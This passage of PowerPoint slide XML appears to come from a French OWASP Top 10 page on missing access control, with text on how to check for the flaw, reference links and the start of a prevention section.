              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’attaquant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visitez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> avec des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>droits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privilégiés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>puis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>réaccédez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fonctionnalités</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>restreintes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> avec des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>droits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inférieurs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pouvez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aussi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inspecter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> le code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gérant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contrôle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’accès</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tracez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requête</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privilégiée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>identifiez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contrôles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’accès</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>présents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>puis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cherchez </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>où</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vérifications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>implémentées</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> probable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>qu’un</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>outil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>identifie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnérabilités</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="6553200"/>
            <a:ext cx="3383280" cy="25908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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Références</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRP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4"/>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5"/>
              </a:rPr>
              <a:t>OWASP Top 10-2007 on Failure to Restrict URL Access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50" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>ESAPI Access Control API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1"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7"/>
              </a:rPr>
              <a:t>OWASP Development Guide: Chapter on Authorization</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8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Path Traversal</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9"/>
              </a:rPr>
              <a:t>OWASP Article on Forced Browsing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Voir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>ASVS requirements area for Access Control (V4)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pour des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exigences</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>additionnelles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contrôle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’accès</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId11"/>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2"/>
              </a:rPr>
              <a:t>CWE Entry 285 on Improper Access Control (Authorization)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3480471" y="3657600"/>
            <a:ext cx="3383280" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s’en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prémunir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Votre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>devrait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utiliser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un module de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gestion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
